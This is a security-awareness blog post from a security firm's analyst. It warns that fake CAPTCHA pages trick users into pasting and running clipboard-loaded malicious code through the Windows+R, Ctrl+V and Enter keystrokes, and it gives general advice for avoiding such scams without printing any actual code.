By Eddy Berry, Security Research Analyst, TraceSecurity
Each day, more and more scams and malicious websites are popping up. It’s dangerous enough to go onto these websites, but bad actors are using common verification tools like CAPTCHA to hack people. CAPTCHAs have been part of the Internet for decades now, but they’ve never really been the target of a hacker tool. If you see one of these verification tools on an unknown website, it’s never a good idea to click them.
They are good to have for websites and other programs, despite them being somewhat annoying. It does reduce the number of bots that can get into a website, considering they need human input to bypass. They are becoming more advanced, but at the same time, bad actors are using them to trick people into installing malware on their computers.
A CAPTCHA, or “Completely Automated Public Turing test to tell Computers and Humans Apart”, is a challenge that some websites use to verify if the user is a human or a bot. It is used to prevent spam and other various automated functions that a bot may bring to the website. Normally, a bot will not be able to activate a CAPTCHA, considering a person has to click pictures or type special characters.
These challenge-response tests have you click a button or checkmark to begin. In doing so, the CAPTCHA function begins, either confirming the response or denying it. However, this is where the bad actors have been taking advantage of these functions, so it’s never a good idea to run these CAPTCHAs on websites that you don’t trust.
Bad actors are using fake CAPTCHAs to install malware onto devices. PCs and mobile devices are not safe from these, regardless if you have defenses against these things. Clicking on a fake CAPTCHA will basically give the malicious website permission to take control of your clipboard function, putting dangerous code onto it.
After you click the “I am not a robot” check mark, the fake CAPTCHA function will secretly add a script or some sort of code to your clipboard. This alone isn’t enough to hack your computer, but the next step informs you to do something strange. It tells you to press the Windows + R keys, press the Ctrl + V keys, and then hit enter. For most people, these may seem like normal things to do, but this is the key to the hack.
The Windows + R keys open up your Command Prompt, which is the console where you can make system changes to your PC. The Ctrl + V keys paste whatever is most recent on your copied clipboard (as in the copy and paste function), and hitting enter will execute the pasted code, which essentially runs the malicious script to your entire PC.
CAPTCHAs will never ask you to do special steps when it comes to verification. At most, you will have to type letters or numbers or click matching pictures. Anything that asks you to press certain keys is incredibly suspicious and it should be treated with the utmost caution. No website will tell you to press certain keystrokes unless they are trying to get deeper into your PC.
It can be overwhelming with all the information floating around when it comes to security awareness. There are millions of scammers out there, many of them with different methods of attack. However, there are a few things that you can remember to keep yourself from being hacked.
The Internet can be a dangerous place with new scams and malicious websites popping up every day. CAPTCHAs are the latest scams for bad actors – they are a perfect target since they’re very common and they all seem different. While they are annoying to get through, CAPTCHAs perform an important function to keep bots and other automation out of websites.
There are plenty of ways to defend against these sorts of attacks. If security awareness is a high priority for you, then it should be easy to recognize a bad actor’s attack. Keep your antivirus and programs up to date, double-check and verify everything, never give personal information, and always trust your gut. Even in today’s harsh environments of cybersecurity, you can always keep your information safe.
Connect with TraceSecurity to learn more.